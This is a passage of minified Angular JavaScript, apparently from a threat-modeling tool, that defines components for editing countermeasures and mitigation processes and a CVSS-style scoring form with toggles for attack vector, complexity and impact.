i,n;Ct("disable",!e.canEdit),g(5),ke(re(6,47,"properties.Name")),g(3),at("matTooltip",e.countermeasure.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Name),g(3),F("ngIf",e.countermeasure.Name),g(6),ke(re(18,49,"general.Number")),g(3),at("matTooltip",e.countermeasure.Number),F("ngModel",e.countermeasure.Number),g(2),F("ngIf",e.countermeasure.CheckUniqueNumber()),g(8),ke(re(31,51,"properties.Status")),g(3),at("matTooltip",re(34,53,e.GetMitigationStateName(e.countermeasure.MitigationState))),F("value",e.countermeasure.MitigationState),g(3),F("ngForOf",e.GetMitigationStates()),g(4),F("ngIf",!e.countermeasure.RuleStillApplies),g(5),ke(re(46,55,"properties.MitigationProcess")),g(3),at("matTooltip",null==e.countermeasure.MitigationProcess?null:e.countermeasure.MitigationProcess.Name),F("value",e.countermeasure.MitigationProcess),g(2),at("placeholder",re(51,57,"general.Search")),g(4),ct("",re(55,59,"properties.selectNone")," "),g(3),F("ngForOf",e.GetMitigationProcesses()),g(3),at("matTooltip",re(61,61,"general.Edit")),F("disabled",!e.countermeasure.MitigationProcess),g(7),at("matTooltip",re(68,63,"general.Add")),g(10),F("ngIf",!e.isManualEntry),g(2),F("ngIf",e.isManualEntry),g(5),ke(re(85,65,"general.Diagram")),g(3),at("matTooltip",null==(i=e.countermeasure.GetDiagram())?null:i.Name),F("spellcheck",e.dataService.HasSpellCheck)("value",null==(n=e.countermeasure.GetDiagram())?null:n.Name),g(8),za("",re(96,67,"general.Control")," (",re(97,69,"general.Informative"),")"),g(4),at("matTooltip",null==e.countermeasure.Control?null:e.countermeasure.Control.Name),F("value",e.countermeasure.Control),g(2),at("placeholder",re(102,71,"general.Search")),g(4),ke(re(106,73,"properties.selectNone")),g(3),F("ngForOf",e.GetControlGroups()),g(3),at("matTooltip",re(112,75,"general.Add")),g(11),ke(re(123,77,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Description),g(3),F("tagableElement",e.countermeasure),g(4),F("ngIf",e.countermeasure.Control),g(2),F("ngIf",e.countermeasure.MitigationProcess),g(2),F("ngForOf",e.countermeasure.AttackScenarios),g(5),F("ngIf",e.dataService.Project.HasTesting)}}let cM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=c,this.dataService=d,this.dialog=T,this.searchCounter=0,this.canEdit=!0,this.isManualEntry=!1,this.elements=[],this.mitigationProcessChange=new Tt,this.searchTCString="",this.countermeasure=e,i&&(this.isManualEntry=i.Value),n&&(this.elements=n),r&&r.subscribe(k=>this.countermeasure=k)}get countermeasure(){return this._countermeasure}set countermeasure(e){this._countermeasure=e,this.controlGroups=this.mitigationProcesses=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetControlGroups(){return null==this.controlGroups&&(this.controlGroups=[],this.dataService.Config.GetControlGroups().forEach(e=>{e.Controls.length>0&&this.controlGroups.push({name:e.Name,Controls:e.Controls})})),this.controlGroups}OnSearchControls(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.controlGroups=null,this.GetControlGroups();const i=e.target.value.toLowerCase(),n=this.countermeasure.Control;this.controlGroups.forEach(r=>{r.Controls=r.Controls.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.controlGroups=this.controlGroups.filter(r=>r.Controls.length>0)}},250)}GetTargetsNames(){if(this.countermeasure.Targets)return this.countermeasure.Targets.map(e=>e.Name).join(", ")}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);this.dialog.OpenAddControlDialog(e).subscribe(i=>{i?this.countermeasure.Control=e:this.dataService.Config.DeleteControl(e)})}AddMitigationProcess(){let e=this.dataService.Project.CreateMitigationProcess();this.countermeasure.MitigationProcess=e,this.dialog.OpenMitigationProcessDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteMitigationProcess(e)}),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},500)}EditMitigationProcess(){this.dialog.OpenMitigationProcessDialog(this.countermeasure.MitigationProcess,!1).subscribe(e=>{})}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.countermeasure.GetTestCases().includes(e))}GetFilteredTestCases(){return this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedCountermeasure(this.countermeasure),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedCountermeasure(this.countermeasure.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}GetMitigationProcesses(){return null==this.mitigationProcesses&&(this.mitigationProcesses=this.dataService.Project.GetMitigationProcesses()),this.mitigationProcesses}OnSearchMitigationProcess(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.mitigationProcesses=null,this.GetMitigationProcesses();const i=e.target.value.toLowerCase(),n=this.countermeasure.MitigationProcess;this.mitigationProcesses=this.mitigationProcesses.filter(r=>n==r||r.Name.toLowerCase().includes(i))}},250)}GetMitigationStates(){return Sl.GetMitigationStates()}GetMitigationStateName(e){return Sl.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jl,8),Ee(hf,8),Ee(Array,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-countermeasure"]],viewQuery:function(e,i){if(1&e&&(Mi(a5e,5),Mi(n5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{countermeasure:"countermeasure",canEdit:"canEdit",isManualEntry:"isManualEntry",elements:"elements"},outputs:{mitigationProcessChange:"mitigationProcessChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill","class","disable","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"label",4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],[4,"ngFor","ngForOf"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],["appearance","fill",1,"disable",2,"width","calc(100% - 300px - 15px)"],["matInput","",3,"value"],["appearance","fill",2,"width","calc(100% - 300px - 15px)"],["matTooltipShowDelay","1000","multiple","",3,"value","matTooltip","valueChange"],[3,"label"],["matExpansionPanelContent",""],[3,"canEdit","control"],[3,"canEdit","mitigationProcess"],[3,"canEdit","attackScenario"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addLinkedTCMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchTCBox",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["filteredTCList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,D5e,143,79,"div",0),2&e&&F("ngIf",i.countermeasure)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();const x5e=["nameBox"];function w5e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){return be(e),Me(V(2).mitigationProcess.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function I5e(t,a){1&t&&(m(0,"mat-hint",25),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function R5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetMitigationProcessStateName(e)))}}function S5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.Name)}}function k5e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-countermeasure",28),s(2,"\n ")),2&t){const e=V().$implicit;g(1),F("countermeasure",e)}}function P5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,k5e,3,1,"ng-template",27),s(16,"\n "),u()),2&t){const e=a.$implicit;g(5),ct("\n ",re(6,2,"general.CountermeasureInfo"),"\n "),g(4),ct("\n ",e.Name,"\n ")}}function O5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",1),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(V().mitigationProcess.Name=n)}),u(),s(10,"\n "),ne(11,w5e,6,3,"button",4),s(12,"\n "),u(),s(13,"\n "),m(14,"mat-form-field",5),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(V().mitigationProcess.Number=n)}),u(),s(21,"\n "),ne(22,I5e,3,3,"mat-hint",7),s(23,"\n "),u(),s(24,"\n "),it(25,"br"),s(26,"\n "),m(27,"mat-form-field",8),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(V().mitigationProcess.MitigationProcessState=n)})("selectionChange",function(n){return be(e),Me(V().OnStateChange(n.value))}),oe(34,"translate"),s(35,"\n "),ne(36,R5e,3,4,"mat-option",10),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),m(40,"mat-icon",11),oe(41,"translate"),s(42,"north_east"),u(),s(43,"\n "),m(44,"mat-slider",12),he("ngModelChange",function(n){return be(e),Me(V().mitigationProcess.Progress=n)})("change",function(n){return be(e),Me(V().OnProgressChange(n.value))}),u(),s(45,"\n "),m(46,"mat-form-field",13),s(47,"\n "),m(48,"mat-label"),s(49),oe(50,"translate"),u(),s(51,"\n "),m(52,"mat-select",14),he("valueChange",function(n){return be(e),Me(V().mitigationProcess.Countermeasures=n)})("selectionChange",function(){return be(e),Me(V().countermeasuresChange.emit())}),s(53,"\n "),m(54,"input",15),he("keyup",function(n){return be(e),Me(V().OnSearchCountermeasure(n))}),oe(55,"translate"),u(),s(56,"\n "),ne(57,S5e,2,2,"mat-option",10),s(58,"\n "),u(),s(59,"\n "),u(),s(60,"\n "),m(61,"mat-form-field",13),s(62,"\n "),m(63,"mat-label"),s(64),oe(65,"translate"),u(),s(66,"\n "),m(67,"textarea",16),he("ngModelChange",function(n){return be(e),Me(V().mitigationProcess.Description=n)}),u(),s(68,"\n "),u(),s(69,"\n "),m(70,"div"),s(71,"\n "),m(72,"h4"),s(73),oe(74,"translate"),m(75,"button",17),s(76,"\n "),m(77,"mat-icon"),s(78,"more_vert"),u(),s(79,"\n "),u(),s(80,"\n "),u(),s(81,"\n "),m(82,"mat-menu",null,18),s(84,"\n "),m(85,"button",19),he("click",function(){return be(e),Me(V().AdoptFromMeasures())}),s(86,"\n "),m(87,"span"),s(88),oe(89,"translate"),u(),s(90,"\n "),u(),s(91,"\n "),u(),s(92,"\n "),it(93,"app-notes",20),s(94,"\n "),u(),s(95,"\n "),m(96,"div"),s(97,"\n "),m(98,"h4"),s(99),oe(100,"translate"),u(),s(101,"\n "),it(102,"app-notes",21),s(103,"\n "),u(),s(104,"\n "),m(105,"mat-accordion",22),s(106,"\n "),ne(107,P5e,17,4,"mat-expansion-panel",23),s(108,"\n "),u(),s(109,"\n "),it(110,"br"),s(111,"\n"),u()}if(2&t){const e=Ti(83),i=V();Ct("disable",!i.canEdit),g(5),ke(re(6,39,"properties.Name")),g(3),at("matTooltip",i.mitigationProcess.Name),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Name),g(3),F("ngIf",i.mitigationProcess.Name),g(6),ke(re(18,41,"general.Number")),g(3),at("matTooltip",i.mitigationProcess.Number),F("ngModel",i.mitigationProcess.Number),g(2),F("ngIf",i.mitigationProcess.CheckUniqueNumber()),g(8),ke(re(31,43,"properties.Status")),g(3),at("matTooltip",re(34,45,i.GetMitigationProcessStateName(i.mitigationProcess.MitigationProcessState))),F("value",i.mitigationProcess.MitigationProcessState),g(3),F("ngForOf",i.GetMitigationProcessStates()),g(4),at("matTooltip",re(41,47,"general.Progress")),g(4),F("displayWith",i.formatLabel)("ngModel",i.mitigationProcess.Progress),g(5),ke(re(50,49,"general.Countermeasures")),g(3),at("matTooltip",i.GetCountermeasuresName(i.mitigationProcess.Countermeasures)),F("value",i.mitigationProcess.Countermeasures),g(2),at("placeholder",re(55,51,"general.Search")),g(3),F("ngForOf",i.GetCountermeasures()),g(7),ke(re(65,53,"properties.Description")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Description),g(6),ct("\n ",re(74,55,"general.Tasks"),"\n "),g(2),F("matMenuTriggerFor",e),g(13),ke(re(89,57,"pages.modeling.mitigationprocess.adoptMeasures")),g(5),F("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.mitigationProcess.Tasks),g(6),ke(re(100,59,"general.Notes")),g(3),F("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.mitigationProcess.Notes),g(5),F("ngForOf",i.mitigationProcess.Countermeasures)}}let _T=(()=>{class t{constructor(e,i,n,r){this.theme=i,this.dataService=n,this.dialog=r,this.searchCounter=0,this.isEdtingArray=[[],[]],this.canEdit=!0,this.countermeasuresChange=new Tt,this.mitigationProcess=e}get mitigationProcess(){return this._mitigationProcess}set mitigationProcess(e){this._mitigationProcess=e,this.countermeasures=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}AdoptFromMeasures(){this.mitigationProcess.Countermeasures.forEach(e=>{this.mitigationProcess.Tasks.some(i=>i.Note==e.Name)||this.mitigationProcess.Tasks.push({Note:e.Name+" (CM"+e.Number.toString()+")",IsChecked:!1,Date:Date.now().toString(),Author:this.dataService.UserDisplayName,HasCheckbox:!0,ShowTimestamp:!1})})}OnStateChange(e){e==kl.WorkInProgress?(0==this.mitigationProcess.Progress&&(this.mitigationProcess.Progress=5),this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)})):e==kl.Completed&&(this.mitigationProcess.Progress=100,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)}))}OnProgressChange(e){100==e?(this.mitigationProcess.MitigationProcessState=kl.Completed,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)})):e>0&&(this.mitigationProcess.MitigationProcessState=kl.WorkInProgress,this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)}))}GetCountermeasures(){return null==this.countermeasures&&(this.countermeasures=this.dataService.Project.GetCountermeasures()),this.countermeasures}OnSearchCountermeasure(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.countermeasures=null,this.GetCountermeasures();const i=e.target.value.toLowerCase(),n=this.mitigationProcess.Countermeasures;this.countermeasures=this.countermeasures.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetCountermeasuresName(e){return null==e?void 0:e.map(i=>i.Name).join(", ")}formatLabel(e){return e.toFixed(0)+"%"}GetMitigationProcessStates(){return C2.GetMitigationStates()}GetMitigationProcessStateName(e){return C2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Lp,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-mitigation-process"]],viewQuery:function(e,i){if(1&e&&Mi(x5e,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{canEdit:"canEdit",mitigationProcess:"mitigationProcess"},outputs:{countermeasuresChange:"countermeasuresChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"value",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",2,"margin-left","10px",3,"matTooltip"],["color","primary","thumbLabel","","tickInterval","5","step","5","min","0","max","100",2,"width","276px",3,"displayWith","ngModel","ngModelChange","change"],["appearance","fill",2,"width","100%"],["no-space","","multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["mat-icon-button","",3,"matMenuTriggerFor"],["moreMenu","matMenu"],["mat-menu-item","",3,"click"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["matExpansionPanelContent",""],[3,"countermeasure"]],template:function(e,i){1&e&&ne(0,O5e,112,61,"div",0),2&e&&F("ngIf",i.mitigationProcess)},styles:[".reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}"]}),t})();var N5e=de(306),L5e=de.n(N5e);function z5e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n "),m(2,"tr"),s(3,"\n "),m(4,"td"),s(5,"\n Attack Vector (AV) \n "),m(6,"mat-icon",1),oe(7,"translate"),s(8,"info"),u(),s(9,"\n "),m(10,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("AV"))}),oe(11,"translate"),s(12,"\n "),m(13,"mat-icon",3),s(14,"edit_note"),u(),s(15,"\n "),u(),s(16,"\n "),u(),s(17,"\n "),m(18,"td"),s(19,"\n Scope (S) \n "),m(20,"mat-icon",1),oe(21,"translate"),s(22,"info"),u(),s(23,"\n "),m(24,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("S"))}),oe(25,"translate"),s(26,"\n "),m(27,"mat-icon",3),s(28,"edit_note"),u(),s(29,"\n "),u(),s(30,"\n "),u(),s(31,"\n "),u(),s(32,"\n "),m(33,"tr"),s(34,"\n "),m(35,"td"),s(36,"\n "),m(37,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.AV=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(38,"\n "),m(39,"mat-button-toggle",5),s(40,"Undefined"),u(),s(41,"\n "),m(42,"mat-button-toggle",6),oe(43,"translate"),s(44,"Network"),u(),s(45,"\n "),m(46,"mat-button-toggle",7),oe(47,"translate"),s(48,"Adjacent Network"),u(),s(49,"\n "),m(50,"mat-button-toggle",8),oe(51,"translate"),s(52,"Local"),u(),s(53,"\n "),m(54,"mat-button-toggle",9),oe(55,"translate"),s(56,"Physical"),u(),s(57,"\n "),u(),s(58,"\n "),u(),s(59,"\n "),m(60,"td"),s(61,"\n "),m(62,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.S=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(63,"\n "),m(64,"mat-button-toggle",5),s(65,"Undefined"),u(),s(66,"\n "),m(67,"mat-button-toggle",10),oe(68,"translate"),s(69,"Unchanged"),u(),s(70,"\n "),m(71,"mat-button-toggle",11),oe(72,"translate"),s(73,"Changed"),u(),s(74,"\n "),u(),s(75,"\n "),u(),s(76,"\n "),u(),s(77,"\n "),m(78,"tr"),s(79,"\n "),m(80,"td"),s(81,"\n Attack Complexity (AC) \n "),m(82,"mat-icon",1),oe(83,"translate"),s(84,"info"),u(),s(85,"\n "),m(86,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("AC"))}),oe(87,"translate"),s(88,"\n "),m(89,"mat-icon",3),s(90,"edit_note"),u(),s(91,"\n "),u(),s(92,"\n "),u(),s(93,"\n "),m(94,"td"),s(95,"\n Confidentiality (C) \n "),m(96,"mat-icon",1),oe(97,"translate"),s(98,"info"),u(),s(99,"\n "),m(100,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("C"))}),oe(101,"translate"),s(102,"\n "),m(103,"mat-icon",3),s(104,"edit_note"),u(),s(105,"\n "),u(),s(106,"\n "),u(),s(107,"\n "),u(),s(108,"\n "),m(109,"tr"),s(110,"\n "),m(111,"td"),s(112,"\n "),m(113,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.AC=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(114,"\n "),m(115,"mat-button-toggle",5),s(116,"Undefined"),u(),s(117,"\n "),m(118,"mat-button-toggle",8),oe(119,"translate"),s(120,"Low"),u(),s(121,"\n "),m(122,"mat-button-toggle",12),oe(123,"translate"),s(124,"High"),u(),s(125,"\n "),u(),s(126,"\n "),u(),s(127,"\n "),m(128,"td"),s(129,"\n "),m(130,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.C=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(131,"\n "),m(132,"mat-button-toggle",5),s(133,"Undefined"),u(),s(134,"\n "),m(135,"mat-button-toggle",6),oe(136,"translate"),s(137,"None"),u(),s(138,"\n "),m(139,"mat-button-toggle",8),oe(140,"translate"),s(141,"Low"),u(),s(142,"\n "),m(143,"mat-button-toggle",12),oe(144,"translate"),s(145,"High"),u(),s(146,"\n "),u(),s(147,"\n "),u(),s(148,"\n "),u(),s(149,"\n "),m(150,"tr"),s(151,"\n "),m(152,"td"),s(153,"\n Privileges Required (PR) \n "),m(154,"mat-icon",1),oe(155,"translate"),s(156,"info"),u(),s(157,"\n "),m(158,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("PR"))}),oe(159,"translate"),s(160,"\n "),m(161,"mat-icon",3),s(162,"edit_note"),u(),s(163,"\n "),u(),s(164,"\n "),u(),s(165,"\n "),m(166,"td"),s(167,"\n Integrity (I) \n "),m(168,"mat-icon",1),oe(169,"translate"),s(170,"info"),u(),s(171,"\n "),m(172,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("I"))}),oe(173,"translate"),s(174,"\n "),m(175,"mat-icon",3),s(176,"edit_note"),u(),s(177,"\n "),u(),s(178,"\n "),u(),s(179,"\n "),u(),s(180,"\n "),m(181,"tr"),s(182,"\n "),m(183,"td"),s(184,"\n "),m(185,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.PR=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(186,"\n "),m(187,"mat-button-toggle",5),s(188,"Undefined"),u(),s(189,"\n "),m(190,"mat-button-toggle",6),oe(191,"translate"),s(192,"None"),u(),s(193,"\n "),m(194,"mat-button-toggle",8),oe(195,"translate"),s(196,"Low"),u(),s(197,"\n "),m(198,"mat-button-toggle",12),oe(199,"translate"),s(200,"High"),u(),s(201,"\n "),u(),s(202,"\n "),u(),s(203,"\n "),m(204,"td"),s(205,"\n "),m(206,"mat-button-toggle-group",4),he("ngModelChange",function(n){return 